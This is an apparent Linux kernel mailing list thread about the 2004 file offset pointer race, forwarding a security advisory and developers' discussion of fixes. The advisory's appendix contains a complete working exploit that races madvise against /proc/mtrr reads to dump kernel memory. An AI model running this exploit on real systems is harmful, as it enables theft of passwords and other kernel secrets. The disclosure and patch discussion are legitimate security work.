* FW: Linux kernel file offset pointer races
@ 2004-08-05 8:42 Giuliano Pochini
2004-08-05 10:30 ` Jirka Kosina
2004-08-05 20:34 ` Alan Cox
0 siblings, 2 replies; 13+ messages in thread
From: Giuliano Pochini @ 2004-08-05 8:42 UTC (permalink / raw)
To: linux-kernel
I don't remember if this issue has already been discussed here:
-----FW: <Pine.LNX.4.44.0408041220550.26961-100000@isec.pl>-----
Date: Wed, 4 Aug 2004 12:22:42 +0200 (CEST)
From: Paul Starzetz <ihaquer@isec.pl>
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.netsys.com
Subject: Linux kernel file offset pointer races
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Synopsis: Linux kernel file offset pointer handling
Product: Linux kernel
Version: 2.4 up to and including 2.4.26, 2.6 up to and
including 2.6.7
Vendor: http://www.kernel.org/
URL: http://isec.pl/vulnerabilities/isec-0016-procleaks.txt
CVE: CAN-2004-0415
Author: Paul Starzetz <ihaquer@isec.pl>
Date: Aug 04, 2004
Issue:
======
A critical security vulnerability has been found in the Linux kernel
code handling 64-bit file offset pointers.
Details:
========
The Linux kernel offers a file handling API to userland applications.
A file is identified by a file name and opened through the open(2)
system call, which returns a file descriptor referring to the kernel
file object.
One of the properties of the file object is the 'file offset' (the
f_pos member variable of the file object), which is advanced when one
reads from or writes to the file. It can also be changed through the
lseek(2) system call and identifies the current reading/writing position
inside the file image on the media.
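To make the file offset concrete, here is a small userspace sketch. The helpers make_scratch_file() and current_offset() are hypothetical, and the sketch assumes a POSIX system with a writable /tmp. It shows read(2) advancing the offset, lseek(2) with SEEK_CUR reporting it, and lseek(2) with SEEK_SET moving it.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Create an anonymous scratch file containing text; returns an fd whose
 * offset has been rewound to 0, or -1 on failure (hypothetical helper). */
static int make_scratch_file(const char *text)
{
    char path[] = "/tmp/fpos-demoXXXXXX";
    int fd = mkstemp(path);
    size_t n = strlen(text);

    if (fd < 0)
        return -1;
    unlink(path);                        /* data lives until fd is closed */
    if (write(fd, text, n) != (ssize_t)n || lseek(fd, 0, SEEK_SET) != 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* The descriptor's current file offset (f_pos of the kernel file object). */
static off_t current_offset(int fd)
{
    return lseek(fd, 0, SEEK_CUR);
}
```

Reading 5 bytes from "hello world" leaves the offset at 5. Querying it with lseek(fd, 0, SEEK_CUR) is the same kind of check the exploit in the appendix uses to detect a corrupted f_pos.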
There are two different versions of the file handling API inside recent
Linux kernels: the old 32-bit and the new (LFS) 64-bit API. We have
identified numerous places where invalid conversions from 64-bit file
offsets to 32-bit ones, as well as insecure accesses to the file offset
member variable, take place.
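As a generic illustration of the 64-to-32-bit conversion problem (not one of the specific call sites the authors found; both helper names are hypothetical), narrowing a 64-bit offset silently keeps only the low 32 bits. An explicit range check is therefore needed before an offset is handed to a 32-bit interface.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* What a silent 64->32 bit narrowing does: only the low 32 bits survive.
 * Going through uint64_t keeps both conversions well defined in C. */
static uint32_t narrow_offset(int64_t off)
{
    return (uint32_t)(uint64_t)off;
}

/* Hypothetical guard: accept an offset for a 32-bit interface only if it
 * is non-negative and representable in a signed 32-bit offset type. */
static bool offset_fits_32(int64_t off)
{
    return off >= 0 && off <= INT32_MAX;
}
```

For example, an offset of 0x100000010 narrows to 0x10, which points at a completely different place in the file.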
We have found that most of the /proc entries (like /proc/version) leak
about one page of uninitialized kernel memory and can be exploited to
obtain sensitive data.
We have found dozens of places with suspicious or bogus code. One of
them resides in the MTRR handling code for the i386 architecture:
static ssize_t mtrr_read(struct file *file, char *buf, size_t len,
                         loff_t *ppos)
{
[1]     if (*ppos >= ascii_buf_bytes) return 0;
[2]     if (*ppos + len > ascii_buf_bytes) len = ascii_buf_bytes - *ppos;
        if ( copy_to_user (buf, ascii_buffer + *ppos, len) ) return -EFAULT;
[3]     *ppos += len;
        return len;
}   /*  End Function mtrr_read  */
It is easy to see that, since copy_to_user() can sleep, a later
reference to *ppos (at [3]) may see a different value from the one
validated by [1] and [2]. In other words, code operating on the
file->f_pos variable through a pointer must be atomic with respect to
the current thread. We expect even more trouble in the SMP case.
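The advisory does not spell out a fix. Below is a minimal userspace model of one defensive pattern. It is assumed here rather than taken from the eventual kernel patches. The idea is to read *ppos exactly once into a local, validate that snapshot (including rejecting negative values), and store the new position back once. copy_out() stands in for copy_to_user(), and buf_read() and loff_sim_t are hypothetical names.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <sys/types.h>

typedef int64_t loff_sim_t;              /* stand-in for the kernel's loff_t */

/* Stand-in for copy_to_user(). The real call may sleep, which is exactly
 * why *ppos must not be re-read after it. Returns 0 on success. */
static int copy_out(char *dst, const char *src, size_t len)
{
    memcpy(dst, src, len);
    return 0;
}

/* Hypothetical hardened read method in the style of mtrr_read():
 * *ppos is read once into a local, validated, and written back once. */
static ssize_t buf_read(const char *src, size_t src_len,
                        char *buf, size_t len, loff_sim_t *ppos)
{
    loff_sim_t pos = *ppos;              /* single snapshot of the offset */

    if (pos < 0)
        return -EINVAL;                  /* never index with a negative offset */
    if ((uint64_t)pos >= src_len)
        return 0;                        /* at or past end of buffer */
    if (len > src_len - (size_t)pos)
        len = src_len - (size_t)pos;     /* clamp without computing pos + len */
    if (copy_out(buf, src + pos, len))
        return -EFAULT;
    *ppos = pos + (loff_sim_t)len;       /* single write-back */
    return (ssize_t)len;
}
```

Every check and the final update use the same local pos. A concurrent change to *ppos while copy_out() sleeps therefore cannot slip past the checks. At worst, that concurrent update is overwritten by the write-back.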
Exploitation:
=============
In the following we concentrate on the mtrr.c code, although we think
that other f_pos handling code in the kernel may also be exploitable.
The idea is to use the blocking property of copy_to_user() to advance the
file->f_pos file offset to a negative value, allowing us to bypass the two
checks marked with [1] and [2] in the above code.
There are two situations where copy_to_user() will sleep if there is no
page table entry for the corresponding location in the user buffer used
to receive the data:
- the underlying buffer maps a file which is not in the kernel page
cache yet, so the file content must first be read from disk;
- the mmap_sem semaphore of the process's VM is held for writing, that
is, another thread sharing the same VM has called down_write on the
semaphore.
We use the second method as follows. One of two threads sharing the same
VM issues a madvise(2) call with the WILLNEED flag on a VMA that maps a
sufficiently large file. This issues a down_write on the mmap semaphore
and schedules a read-ahead request for the mmaped file.
In the meantime, the second thread issues a read on the /proc/mtrr file
and goes to sleep until the first thread returns from the madvise system
call. The two threads are woken up in FIFO order, so the first thread
runs first and can advance the file pointer of the proc file to the
maximum possible value of 0x7fffffffffffffff while the second thread is
still waiting in the scheduler queue for the CPU (in the non-SMP case).
After the line marked with [3] has been executed, the file position
will be negative, and the checks [1] and [2] can be passed for any
buffer length supplied, thus leaking kernel memory from the address of
ascii_buffer onward to user space.
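The arithmetic behind [1] to [3] can be checked in isolation. This sketch simplifies by modelling every quantity as a signed 64-bit value. In the kernel, len is a size_t and ascii_buf_bytes has its own type. The sketch models the wrap-around of *ppos += len with unsigned arithmetic, because signed overflow is undefined in userspace C. The conversion back to int64_t is implementation-defined, and GCC and Clang define it as reduction modulo 2^64. naive_clamp() and wrapped_add() are hypothetical names.

```c
#include <assert.h>
#include <stdint.h>

/* Mirrors checks [1] and [2] of mtrr_read(): returns how many bytes would
 * be copied (0 means EOF). `bytes` plays the role of ascii_buf_bytes. */
static int64_t naive_clamp(int64_t pos, int64_t len, int64_t bytes)
{
    if (pos >= bytes)                    /* check [1] */
        return 0;
    if (pos + len > bytes)               /* check [2] */
        len = bytes - pos;
    return len;
}

/* Models [3] (*ppos += len) with two's-complement wrap-around. The addition
 * is done in uint64_t to avoid signed-overflow UB; converting the result
 * back to int64_t is implementation-defined but wraps on GCC and Clang. */
static int64_t wrapped_add(int64_t pos, int64_t len)
{
    return (int64_t)((uint64_t)pos + (uint64_t)len);
}
```

Starting from 0x7fffffffffffffff and adding 100 gives INT64_MIN + 99. With that position, neither check fires, and the full 4096 requested bytes would be "copied". A robust check must also reject pos < 0.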
We have attached proof-of-concept exploit code that reads portions of
kernel memory. Another exploit we have at our disposal can use other
/proc entries (like /proc/version) to read one page of kernel memory.
Impact:
=======
Since no special privileges are required to open the /proc/mtrr file for
reading, any process may exploit the bug to read huge parts of kernel
memory.
The kernel memory dump may include very sensitive information such as
hashed passwords from /etc/shadow or even the root password.
In an experiment, we found that after the root user logged in using
ssh (in our case OpenSSH using PAM), the root password was kept in
kernel memory. This is very surprising, since sshd quickly cleans
(overwrites with zeros) the memory used to store the password.
However, the password may have made its way through various kernel
paths such as pipes or sockets.
Tested and known to be vulnerable kernel versions are all <= 2.4.26 and
<= 2.6.7. All users are encouraged to patch all vulnerable systems as
soon as appropriate vendor patches are released. There is no hotfix for
this vulnerability.
Credits:
========
Paul Starzetz <ihaquer@isec.pl> has identified the vulnerability and
performed further research. COPYING, DISTRIBUTION, AND MODIFICATION OF
INFORMATION PRESENTED HERE IS ALLOWED ONLY WITH EXPRESS PERMISSION OF
ONE OF THE AUTHORS.
Disclaimer:
===========
This document and all the information it contains are provided "as is",
for educational purposes only, without warranty of any kind, whether
express or implied.
The authors reserve the right not to be responsible for the topicality,
correctness, completeness or quality of the information provided in
this document. Liability claims regarding damage caused by the use of
any information provided, including any kind of information which is
incomplete or incorrect, will therefore be rejected.
Appendix:
=========
/*
*
* /proc ppos kernel memory read (semaphore method)
*
* gcc -O3 proc_kmem_dump.c -o proc_kmem_dump
*
* Copyright (c) 2004 iSEC Security Research. All Rights Reserved.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <time.h>
#include <sched.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <sys/time.h>
#include <sys/mman.h>
#include <linux/unistd.h>
#include <asm/page.h>
// define machine mem size in MB
#define MEMSIZE 64
_syscall5(int, _llseek, uint, fd, ulong, hi, ulong, lo, loff_t *, res,
uint, wh);
void fatal(const char *msg)
{
printf("\n");
if(!errno) {
fprintf(stderr, "FATAL ERROR: %s\n", msg);
}
else {
perror(msg);
}
printf("\n");
fflush(stdout);
fflush(stderr);
exit(31337);
}
static int cpid, nc, fd, pfd, r=0, i=0, csize, fsize=1024*1024*MEMSIZE,
size=PAGE_SIZE, us;
static volatile int go[2];
static loff_t off;
static char *buf=NULL, *file, child_stack[PAGE_SIZE];
static struct timeval tv1, tv2;
static struct stat st;
// child close semaphore & sleep
int start_child(void *arg)
{
// unlock parent & close semaphore
go[0]=0;
madvise(file, csize, MADV_DONTNEED);
madvise(file, csize, MADV_SEQUENTIAL);
gettimeofday(&tv1, NULL);
read(pfd, buf, 0);
go[0]=1;
r = madvise(file, csize, MADV_WILLNEED);
if(r)
fatal("madvise");
// parent blocked on mmap_sem? GOOD!
if(go[1] == 1 || _llseek(pfd, 0, 0, &off, SEEK_CUR)<0 ) {
r = _llseek(pfd, 0x7fffffff, 0xffffffff, &off, SEEK_SET);
if( r == -1 )
fatal("lseek");
printf("\n Race won!"); fflush(stdout);
go[0]=2;
} else {
printf("\n Race lost %d, use another file!\n", go[1]);
fflush(stdout);
kill(getppid(), SIGTERM);
}
_exit(1);
return 0;
}
void usage(char *name)
{
printf("\nUSAGE: %s <file not in cache>", name);
printf("\n");
exit(1);
}
int main(int ac, char **av)
{
if(ac<2)
usage(av[0]);
// mmap big file not in cache
r=stat(av[1], &st);
if(r)
fatal("stat file");
csize = (st.st_size + (PAGE_SIZE-1)) & ~(PAGE_SIZE-1);
fd=open(av[1], O_RDONLY);
if(fd<0)
fatal("open file");
file=mmap(NULL, csize, PROT_READ, MAP_SHARED, fd, 0);
if(file==MAP_FAILED)
fatal("mmap");
close(fd);
printf("\n mmaped uncached file at %p - %p", file, file+csize);
fflush(stdout);
pfd=open("/proc/mtrr", O_RDONLY);
if(pfd<0)
fatal("open");
fd=open("kmem.dat", O_RDWR|O_CREAT|O_TRUNC, 0644);
if(fd<0)
fatal("open data");
r=ftruncate(fd, fsize);
if(r<0)
fatal("ftruncate");
buf=mmap(NULL, fsize, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
if(buf==MAP_FAILED)
fatal("mmap");
close(fd);
printf("\n mmaped kernel data file at %p", buf);
fflush(stdout);
// clone thread wait for child sleep
nc = nice(0);
cpid=clone(&start_child, child_stack + sizeof(child_stack)-4,
CLONE_FILES|CLONE_VM, NULL);
nice(19-nc);
while(go[0]==0) {
i++;
}
// try to read & sleep & move fpos to be negative
gettimeofday(&tv1, NULL);
go[1] = 1;
r = read(pfd, buf, size );
go[1] = 2;
gettimeofday(&tv2, NULL);
if(r<0)
fatal("read");
while(go[0]!=2) {
i++;
}
us = tv2.tv_sec - tv1.tv_sec;
us *= 1000000;
us += (tv2.tv_usec - tv1.tv_usec) ;
printf("\n READ %d bytes in %d usec", r, us); fflush(stdout);
r = _llseek(pfd, 0, 0, &off, SEEK_CUR);
if(r < 0 ) {
printf("\n SUCCESS, lseek fails, reading kernel mem...\n");
fflush(stdout);
i=0;
for(;;) {
r = read(pfd, buf, PAGE_SIZE );
if(r!=PAGE_SIZE)
break;
buf += PAGE_SIZE;
i++; printf("\r PAGE %6d", i); fflush(stdout);
}
printf("\n done, err=%s", strerror(errno) );
fflush(stdout);
}
close(pfd);
printf("\n");
sleep(1);
kill(cpid, 9);
return 0;
}
--
Paul Starzetz
iSEC Security Research
http://isec.pl/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)
iD8DBQFBELj2C+8U3Z5wpu4RAgZZAKC8SxT6m4XMoU1koNfFLbf1Vfj32wCgubCT
k2SjwaZ3U2CsOQmcvjRr1IA=
=hIiM
-----END PGP SIGNATURE-----
--------------End of forwarded message-------------------------
--
Giuliano.
* Re: FW: Linux kernel file offset pointer races
2004-08-05 8:42 FW: Linux kernel file offset pointer races Giuliano Pochini
@ 2004-08-05 10:30 ` Jirka Kosina
2004-08-07 17:15 ` Marcelo Tosatti
2004-08-09 8:33 ` Frank Steiner
2004-08-05 20:34 ` Alan Cox
1 sibling, 2 replies; 13+ messages in thread
From: Jirka Kosina @ 2004-08-05 10:30 UTC (permalink / raw)
To: Giuliano Pochini; +Cc: linux-kernel
On Thu, 5 Aug 2004, Giuliano Pochini wrote:
> I don't remember if this issue has already been discussed here:
> -----FW: <Pine.LNX.4.44.0408041220550.26961-100000@isec.pl>-----
> Date: Wed, 4 Aug 2004 12:22:42 +0200 (CEST)
> From: Paul Starzetz <ihaquer@isec.pl>
> To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
> full-disclosure@lists.netsys.com
> Subject: Linux kernel file offset pointer races
It hasn't been discussed here, but at
http://linux.bkbits.net:8080/linux-2.4/gnupatch@411064f7uz3rKDb73dEb4vCqbjEIdw
you can find a patchset fixing (some of) the mentioned problems. This
patchset is from 2.4.27-rc5
--
JiKos.
* Re: FW: Linux kernel file offset pointer races
2004-08-05 8:42 FW: Linux kernel file offset pointer races Giuliano Pochini
2004-08-05 10:30 ` Jirka Kosina
@ 2004-08-05 20:34 ` Alan Cox
1 sibling, 0 replies; 13+ messages in thread
From: Alan Cox @ 2004-08-05 20:34 UTC (permalink / raw)
To: Giuliano Pochini; +Cc: Linux Kernel Mailing List
On Iau, 2004-08-05 at 09:42, Giuliano Pochini wrote:
> I don't remember if this issue has already been discussed here:
It's mostly been discussed on vendor-sec so far. Paul was gracious enough
to give everyone time to work on the problem. Al Viro did some original
patches, various folks then moved them to 2.6 and fixed other stuff from
further review.
Andrew has 2.6 draft patches, Marcelo actively worked on the 2.4 ones
(and some 2.6 glitches). If you need 2.6 patches "right now" then one
place to grab them is from the current Fedora 2 kernel.
Alan
* Re: FW: Linux kernel file offset pointer races
2004-08-05 10:30 ` Jirka Kosina
@ 2004-08-07 17:15 ` Marcelo Tosatti
2004-08-11 14:26 ` Andrey Savochkin
2004-08-09 8:33 ` Frank Steiner
1 sibling, 1 reply; 13+ messages in thread
From: Marcelo Tosatti @ 2004-08-07 17:15 UTC (permalink / raw)
To: Jirka Kosina; +Cc: Giuliano Pochini, linux-kernel
On Thu, Aug 05, 2004 at 12:30:23PM +0200, Jirka Kosina wrote:
> On Thu, 5 Aug 2004, Giuliano Pochini wrote:
>
> > I don't remember if this issue has already been discussed here:
> > -----FW: <Pine.LNX.4.44.0408041220550.26961-100000@isec.pl>-----
> > Date: Wed, 4 Aug 2004 12:22:42 +0200 (CEST)
> > From: Paul Starzetz <ihaquer@isec.pl>
> > To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
> > full-disclosure@lists.netsys.com
> > Subject: Linux kernel file offset pointer races
>
> It hasn't been discussed here, but at
> http://linux.bkbits.net:8080/linux-2.4/gnupatch@411064f7uz3rKDb73dEb4vCqbjEIdw
> you can find a patchset fixing (some of) the mentioned problems. This
> patchset is from 2.4.27-rc5
"some of" ?
Do you know any unfixed still broken piece of driver code ?
* Re: FW: Linux kernel file offset pointer races
2004-08-05 10:30 ` Jirka Kosina
2004-08-07 17:15 ` Marcelo Tosatti
@ 2004-08-09 8:33 ` Frank Steiner
2004-08-09 14:45 ` Alan Cox
1 sibling, 1 reply; 13+ messages in thread
From: Frank Steiner @ 2004-08-09 8:33 UTC (permalink / raw)
To: Jirka Kosina; +Cc: Giuliano Pochini, linux-kernel
Jirka Kosina wrote:
> It hasn't been discussed here, but at
> http://linux.bkbits.net:8080/linux-2.4/gnupatch@411064f7uz3rKDb73dEb4vCqbjEIdw
> you can find a patchset fixing (some of) the mentioned problems. This
> patchset is from 2.4.27-rc5
So this is for 2.4. What about 2.6? Distributors like RedHat have patched
their 2.6.7 kernel accordingly, but I haven't found anything similar in
the kernel tree from kernel.org. Do you know if there is any fix for
the 2.6 tree, too?
cu,
Frank
--
Dipl.-Inform. Frank Steiner Web: http://www.bio.ifi.lmu.de/~steiner/
Lehrstuhl f. Bioinformatik Mail: http://www.bio.ifi.lmu.de/~steiner/m/
LMU, Amalienstr. 17 Phone: +49 89 2180-4049
80333 Muenchen, Germany Fax: +49 89 2180-99-4049
* Re: FW: Linux kernel file offset pointer races
2004-08-09 8:33 ` Frank Steiner
@ 2004-08-09 14:45 ` Alan Cox
2004-08-09 16:50 ` Jonathan Corbet
2004-08-10 6:08 ` Frank Steiner
0 siblings, 2 replies; 13+ messages in thread
From: Alan Cox @ 2004-08-09 14:45 UTC (permalink / raw)
To: Frank Steiner; +Cc: Jirka Kosina, Giuliano Pochini, Linux Kernel Mailing List
On Llu, 2004-08-09 at 09:33, Frank Steiner wrote:
> So this is for 2.4. What about 2.6? Distributors like RedHat have patched
> their 2.6.7 kernel accordingly, but I haven't found anything similar in
> the kernel tree from kernel.org. Do you know if there is any fix for
> the 2.6 tree, too?
If you want a fix now grab the Red Hat or SuSE published fixes. The
final stuff will probably look very different because Linus has
proposed a different solution that makes it harder for new drivers to
make the same mistakes again
* Re: FW: Linux kernel file offset pointer races
2004-08-09 14:45 ` Alan Cox
@ 2004-08-09 16:50 ` Jonathan Corbet
2004-08-09 17:24 ` Linus Torvalds
2004-08-10 6:08 ` Frank Steiner
1 sibling, 1 reply; 13+ messages in thread
From: Jonathan Corbet @ 2004-08-09 16:50 UTC (permalink / raw)
To: Alan Cox; +Cc: linux-kernel, torvalds
> Linus has
> proposed a different solution that makes it harder for new drivers to
> make the same mistakes again
This (along with the bits which have just gone into BK) hints at a
driver API change. Inquiring minds are *very* curious about such things
at the moment... will there be a file_operations method prototype
change associated with the file offset fixes?
Thanks,
jon
* Re: FW: Linux kernel file offset pointer races
2004-08-09 16:50 ` Jonathan Corbet
@ 2004-08-09 17:24 ` Linus Torvalds
0 siblings, 0 replies; 13+ messages in thread
From: Linus Torvalds @ 2004-08-09 17:24 UTC (permalink / raw)
To: Jonathan Corbet; +Cc: Alan Cox, linux-kernel
On Mon, 9 Aug 2004, Jonathan Corbet wrote:
>
> This (along with the bits which have just gone into BK) hints at a
> driver API change. Inquiring minds are *very* curious about such things
> at the moment... will there be a file_operations method prototype
> change associated with the file offset fixes?
No, it's all just building up to the kernel internally always using a
pread/pwrite-like thing to the drivers, and then maintaining f_pos
entirely in the VFS layer. All the VFS interfaces do this already (since
that is how the user-visible pread/pwrite works).
But a few drivers are buggy (they access f_pos directly even if it was a
user-level pread/pwrite), and in particular the /proc sysctl interface was
totally broken this way.
So I've fixed the sysctl code - that _did_ require a prototype change, but
wasn't horribly painful, and am going through drivers..
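The design Linus describes can be sketched in userspace C under simplifying assumptions. The driver method only ever sees a private position pointer. The read(2)-style path copies f_pos in and out around the call, and the pread(2)-style path passes the caller's offset without touching f_pos. All names here (struct file_sim, simple_read, vfs_read_sim, vfs_pread_sim) are hypothetical, and the real VFS code is more involved.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <sys/types.h>

typedef int64_t loff_sim_t;              /* stand-in for loff_t */

/* Hypothetical driver read method: it only sees a private position. */
typedef ssize_t (*read_method)(const char *data, size_t size,
                               char *buf, size_t len, loff_sim_t *pos);

struct file_sim {
    loff_sim_t f_pos;                    /* touched only by the "VFS" below */
    const char *data;
    size_t size;
    read_method read;
};

static ssize_t simple_read(const char *data, size_t size,
                           char *buf, size_t len, loff_sim_t *pos)
{
    if (*pos < 0)
        return -EINVAL;
    if ((uint64_t)*pos >= size)
        return 0;
    if (len > size - (size_t)*pos)
        len = size - (size_t)*pos;
    memcpy(buf, data + *pos, len);
    *pos += (loff_sim_t)len;
    return (ssize_t)len;
}

/* read(2)-like path: copy f_pos in, call the method, copy it back out. */
static ssize_t vfs_read_sim(struct file_sim *f, char *buf, size_t len)
{
    loff_sim_t pos = f->f_pos;
    ssize_t ret = f->read(f->data, f->size, buf, len, &pos);
    if (ret > 0)
        f->f_pos = pos;
    return ret;
}

/* pread(2)-like path: the caller's offset is used and f_pos is untouched. */
static ssize_t vfs_pread_sim(struct file_sim *f, char *buf, size_t len,
                             loff_sim_t offset)
{
    return f->read(f->data, f->size, buf, len, &offset);
}
```

A driver written against this shape cannot corrupt f_pos during a pread(), because it never receives a pointer to it.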
Linus
* Re: FW: Linux kernel file offset pointer races
2004-08-09 14:45 ` Alan Cox
2004-08-09 16:50 ` Jonathan Corbet
@ 2004-08-10 6:08 ` Frank Steiner
1 sibling, 0 replies; 13+ messages in thread
From: Frank Steiner @ 2004-08-10 6:08 UTC (permalink / raw)
To: Alan Cox; +Cc: Kernel Mailing List
Alan Cox wrote:
> If you want a fix now grab the Red Hat or SuSE published fixes. The
> final stuff will probably look very different because Linus has
> proposed a different solution that makes it harder for new drivers to
> make the same mistakes again
Thank you very much for clarifying this!
cu,
Frank
--
Dipl.-Inform. Frank Steiner Web: http://www.bio.ifi.lmu.de/~steiner/
Lehrstuhl f. Bioinformatik Mail: http://www.bio.ifi.lmu.de/~steiner/m/
LMU, Amalienstr. 17 Phone: +49 89 2180-4049
80333 Muenchen, Germany Fax: +49 89 2180-99-4049
* Re: FW: Linux kernel file offset pointer races
2004-08-07 17:15 ` Marcelo Tosatti
@ 2004-08-11 14:26 ` Andrey Savochkin
2004-08-11 21:14 ` Marcelo Tosatti
0 siblings, 1 reply; 13+ messages in thread
From: Andrey Savochkin @ 2004-08-11 14:26 UTC (permalink / raw)
To: Marcelo Tosatti; +Cc: Jirka Kosina, Giuliano Pochini, linux-kernel
BTW, f_pos assignments are non-atomic on IA-32 since it's a 64-bit value.
The file position is protected by the BKL in llseek(), but I do not see any
serialization in sys_read(), in generic_file_read(), or in other
methods.
Have we accepted that the file position may be corrupted after crossing 2^32
boundary by 2 processes reading in parallel from the same file?
Or am I missing something?
Andrey
On Sat, Aug 07, 2004 at 02:15:00PM -0300, Marcelo Tosatti wrote:
> On Thu, Aug 05, 2004 at 12:30:23PM +0200, Jirka Kosina wrote:
> > On Thu, 5 Aug 2004, Giuliano Pochini wrote:
> >
> > > I don't remember if this issue has already been discussed here:
> > > -----FW: <Pine.LNX.4.44.0408041220550.26961-100000@isec.pl>-----
> > > Date: Wed, 4 Aug 2004 12:22:42 +0200 (CEST)
> > > From: Paul Starzetz <ihaquer@isec.pl>
> > > To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
> > > full-disclosure@lists.netsys.com
> > > Subject: Linux kernel file offset pointer races
> >
> > It hasn't been discussed here, but at
> > http://linux.bkbits.net:8080/linux-2.4/gnupatch@411064f7uz3rKDb73dEb4vCqbjEIdw
> > you can find a patchset fixing (some of) the mentioned problems. This
> > patchset is from 2.4.27-rc5
>
> "some of" ?
>
> Do you know any unfixed still broken piece of driver code ?
* Re: FW: Linux kernel file offset pointer races
2004-08-11 14:26 ` Andrey Savochkin
@ 2004-08-11 21:14 ` Marcelo Tosatti
2004-08-12 7:55 ` Andrey Savochkin
0 siblings, 1 reply; 13+ messages in thread
From: Marcelo Tosatti @ 2004-08-11 21:14 UTC (permalink / raw)
To: Andrey Savochkin; +Cc: Jirka Kosina, Giuliano Pochini, linux-kernel
On Wed, Aug 11, 2004 at 06:26:02PM +0400, Andrey Savochkin wrote:
> BTW, f_pos assignments are non-atomic on IA-32 since it's a 64-bit value.
> The file position is protected by the BKL in llseek(), but I do not see any
> serialization in sys_read(), in generic_file_read(), or in other
> methods.
>
> Have we accepted that the file position may be corrupted after crossing 2^32
> boundary by 2 processes reading in parallel from the same file?
> Or am I missing something?
Yes, as far as I know, parallel users of the same file descriptions (which
can race on 64-bit architectures) are expected; we don't care about handling it.
Behaviour is undefined.
* Re: FW: Linux kernel file offset pointer races
2004-08-11 21:14 ` Marcelo Tosatti
@ 2004-08-12 7:55 ` Andrey Savochkin
2004-08-12 13:53 ` Marcelo Tosatti
0 siblings, 1 reply; 13+ messages in thread
From: Andrey Savochkin @ 2004-08-12 7:55 UTC (permalink / raw)
To: Marcelo Tosatti; +Cc: Jirka Kosina, Giuliano Pochini, linux-kernel
On Wed, Aug 11, 2004 at 06:14:30PM -0300, Marcelo Tosatti wrote:
> On Wed, Aug 11, 2004 at 06:26:02PM +0400, Andrey Savochkin wrote:
> > BTW, f_pos assignments are non-atomic on IA-32 since it's a 64-bit value.
> > The file position is protected by the BKL in llseek(), but I do not see any
> > serialization in sys_read(), in generic_file_read(), or in other
> > methods.
> >
> > Have we accepted that the file position may be corrupted after crossing 2^32
> > boundary by 2 processes reading in parallel from the same file?
> > Or am I missing something?
>
> Yes, as far as I know, parallel users of the same file descriptions (which
> can race on 64-bit architectures) are expected; we don't care about handling it.
>
> Behaviour is undefined.
I prefer explainable behaviours :)
If 2 processes start reading at offset 0xfffffffe, and one of them reads 1
byte and the second 2 bytes, I can expect the file position be 0xffffffff,
0x100000000, 0x100000001, or, in the worst case, 0xfffffffe again.
But 0x1ffffffff will be a real surprise.
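The 0x1ffffffff value follows from a torn store. On IA-32, a 64-bit f_pos update is typically compiled into two 32-bit stores, so interleaved updates can leave the high word of one result next to the low word of the other. The sketch below models only the resulting value, not the race itself. torn_value() is a hypothetical helper.

```c
#include <assert.h>
#include <stdint.h>

/* Models the outcome of a torn 64-bit store on a 32-bit CPU: the high
 * 32 bits come from one writer's result, the low 32 bits from the other's. */
static uint64_t torn_value(uint64_t high_from, uint64_t low_from)
{
    return (high_from & 0xffffffff00000000ULL) |
           (low_from  & 0x00000000ffffffffULL);
}
```

Starting at 0xfffffffe, the 1-byte reader computes 0xffffffff and the 2-byte reader computes 0x100000000. Pairing the high word of the latter with the low word of the former yields 0x1ffffffff, and the opposite pairing yields 0.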
For a bigger surprise, we can kill one of the processes with SIGFPE if we
find that the processes perform such an "incorrect" parallel read and the
file position has changed behind us ;)
But we don't want that much undefined behaviour, do we? :)
Best regards
Andrey
* Re: FW: Linux kernel file offset pointer races
2004-08-12 7:55 ` Andrey Savochkin
@ 2004-08-12 13:53 ` Marcelo Tosatti
0 siblings, 0 replies; 13+ messages in thread
From: Marcelo Tosatti @ 2004-08-12 13:53 UTC (permalink / raw)
To: Andrey Savochkin; +Cc: Jirka Kosina, Giuliano Pochini, linux-kernel
Hi Andrey,
On Thu, Aug 12, 2004 at 11:55:31AM +0400, Andrey Savochkin wrote:
> On Wed, Aug 11, 2004 at 06:14:30PM -0300, Marcelo Tosatti wrote:
> > On Wed, Aug 11, 2004 at 06:26:02PM +0400, Andrey Savochkin wrote:
> > > BTW, f_pos assignments are non-atomic on IA-32 since it's a 64-bit value.
> > > The file position is protected by the BKL in llseek(), but I do not see any
> > > serialization in sys_read(), in generic_file_read(), or in other
> > > methods.
> > >
> > > Have we accepted that the file position may be corrupted after crossing 2^32
> > > boundary by 2 processes reading in parallel from the same file?
> > > Or am I missing something?
> >
> > Yes, as far as I know, parallel users of the same file descriptions (which
> > can race on 64-bit architectures) are expected; we don't care about handling it.
> >
> > Behaviour is undefined.
>
> I prefer explainable behaviours :)
Do the locking in the concurrent userspace pos users, then :)
> If 2 processes start reading at offset 0xfffffffe, and one of them reads 1
> byte and the second 2 bytes, I can expect the file position be 0xffffffff,
> 0x100000000, 0x100000001, or, in the worst case, 0xfffffffe again.
> But 0x1ffffffff will be a real surprise.
>
> For a bigger surprise, we can kill one of the processes with SIGFPE if we
> find that the processes perform such an "incorrect" parallel read and the
> file position has changed behind us ;)
> But we don't want that much undefined behaviour, do we? :)
quoting viro:
"FWIW, anybody who mixes read() and lseek() on the same descriptor without
